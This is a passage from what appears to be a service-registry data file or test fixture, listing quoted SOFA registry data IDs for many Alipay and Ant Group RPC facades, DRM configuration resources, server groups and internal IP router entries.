0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.200.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dpc.log.LogService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecsa.common.service.facade.MenuConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP-S-MOBILEAPP-CDN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_CONSUMECENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.disputecenter.common.service.facade.api.DisputeAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSceneAuthorizationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_IRISKMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.alipay.account.sell@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cfpcenter.emergency.biz.drm.SystemConfigDrmResource.deleteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.180.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:zmopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.schedule.TaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.OpenOperatorPermissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.scene.regulation.RefundOrderFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisioncenter.common.service.facade.api.DecideRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aconeconsole.common.service.facade.ApiProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.BusinessAreaPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.admin.FileSourcePolicyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.InterfaceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpmetaportal.common.facade.api.ProductApi:1.0:dataphin-dpmetaportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.fundentry.OperateReviewFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bcm.common.service.facade.FinmngCertMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CompanyCertifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finfocore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_C_EBPPGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundboss.common.service.facade.issue.FundIssueFacade.queryIssueList:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:dsrconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.HistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.conf.ContactConfManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.elastic.insmobile.mobileDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.emcooperate.common.service.facade.ApplyBreakServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.fc.fcbuservice.common.service.facade.manager.RoleManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fininflux.common.service.facade.influx.InfluxResponseService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.college.materialtag.MaterialTagQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.fortuneday.FortuneDayTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:sccounter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:zpaascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.AutoInvestPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mordercenter.common.service.facade.api.KbOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.advancepayment.api.AptransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custstk.scheduler.plugin.sofa.service.SchedulerManageFacade:1.0:schedulerManageFacade-cifprocess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_2600#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.finreconTddlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodmng.common.service.integration.batchpay.BatchPayClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.upload.KbdishUploadSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.mng.facade.api.InstanceMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.speech.topic.TopicFeedsGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.MgwCombineDrmResource.hzfDailyTaskCombineProcessAsyncWaitTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dayutrprod.common.facade.link.GOCMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ar-action-msg-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mychain.logistic.credit.transfer.facade.CreditMonitorFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:approveAbsAssetRiskTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.koubei.CreateShopAndGoodsServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INCHANNEL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:buamlmatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.core.service.api.FileGenerateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:meta2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.postPonePlanTypeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cif.facade.UserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.175.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.237.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.api.account.CfpStandardFundFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_RISKMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promomng.core.model.antworkbench.repository.AntWorkOrderDetailRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:inu_service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbdevice.common.service.facade.device.DeviceMetadataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.drillcenter.facade.liquid.LiquidAttackComponentFacade:1.0:iliquidity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCLendApplyOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.deposit.ExpressDepositService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.erra.service.ErraRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ucdpmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.common.service.facade.api.AlCorpLicenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.core.ProductPushService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.154.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.rdf.log.conf.BizMonLogConfCtrlDrm.shadowLogLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebcore.common.facade.service.query.AutoTransferInRecordListQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_COUNTER_SYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:monitorActionTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowCommonReplyGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.ZbdmMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinspect.facade.task.TaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fortunecust.service.facade.equity.EquityMemberInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedOldData2SyncTableDrm.syncTbSceneType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbcateringorder.common.service.facade.api.order.merchant.CateringOrderQueryForMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditagreement.pcagAgDynamicDataCorrectTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.maxTotalConnections,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accordercore.api.TransferAndFreezeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.zcache.switcher.bankcardTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fiscore.common.service.facade.api.CreditBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa4corelxy.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.merchantinfo.MrchantBaseInfoService:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTSTUB#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.subcard.query.SubCardCancelCallbackService:1.0:mwealthprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.treasurycenter.facade.api.fund.TreasuryFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.record.service.TradeRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.179.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.security.InspectObjectMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.common.service.facade.config.ConfigUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.masterdata.common.service.facade.MasterDataQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.igopcore.common.service.facade.api.contract.ContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_RPC_TRANSMIT_FINSCENE_FINSCENE-SURGE113557#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@ddsconsole#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.39.178.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csshield.service.facade.robot.AnswerEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.brand.BrandQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.ArPlatformRZoneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfquote.common.service.facade.api.AssignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesGoodsItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.fetch.service.EcoPageFetchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditguarantee.common.service.facade.GuaranteeApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@distinguishprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.afsc.common.service.multimonitor.service.AlertMessageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:zqualitypivot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchiscore_invokeIndustryMgrNotifyProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.gateway.service.RegressionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.client.ComponentFunctionInvokeManager:1.0:finstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.security.ExterfaceNotifyParamService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.masterdata.common.service.facade.MasterDataCZoneOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.paycore.ReceiptTargetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcServerQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.migrateFlagSceneTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.trade.prod.schedule.drm.SyncInitAndPrecheckedOrderDRMResource.batchSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.IndexRegionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","opensupport@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_M_ENTCIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_ALI_TP_S_BC_TPP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imasp.common.service.facade.IndustryPromoCalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.CardModeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.trip.push.trustee@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.midas.service.facade.api.PatternQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.DispatchTaskExecuteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.biz.event.service.EventProcessorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffgroup-antresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qualityprod.service.riskctrl.facade.ChangeCtrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTradeStandardCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseClusterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acccenter.common.service.facade.inner.ProductUserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.170.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.discount.common.service.facade.DiscountConsultiveService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:mcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.PlatformControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkbcs.common.service.facade.clearing.api.BcsPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.biz.mwallet.pass.manager.OperateManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.78.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.checkruleexec.common.service.facade.ZdalProxyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbomp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbprizeprod.common.service.facade.CampInfoConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.RanklistFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.ReleaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:qrtbscan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_limitSetAntProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","frdataaccess@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secdatacontext.common.facade.spi.AssetsMetaAccessSpi:1.0:vEventProp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.bizfee.facade.PkgArServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.price.PricemngPriceSceneDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.scene.FinSceneRuleCenterDrmImpl.starWishYebInvestCanOpenConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finrepaycenter.common.service.facade.RefundRetryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.namelist.NameListServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcontractcore.facade.legal.LegalContractTemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccmfactory.facade.search.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.supergwlite.components.umessage.UniMsgConfigResource.whiteListType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.fc.paramcore.common.service.domain.manage.facade.ldc.ParamCoreLdcDrm.ldcCZoneOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mfinbaseprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_ALI_TP_F_PCREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.180.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundmng.common.service.facade.RegisteredFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_TRADE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mpa.common.service.MpaExecuteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zparamcore_cicadacPipelineProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mfinbaseprod:name=com.alipay.darwin.release.releaseJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.amc.service.AmcCaseTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwdssp.service.DistributeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.entrance.ShopQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.reading.common.service.facade.offer.OfferInfoGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArInvoiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.promocode.PromoCodeApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_capitalUnfreezeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:benetnasch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.185.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.testTool.CaseResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.service.facade.api.OrderCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.pointmng.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:finbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.ProductConflictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbreservationp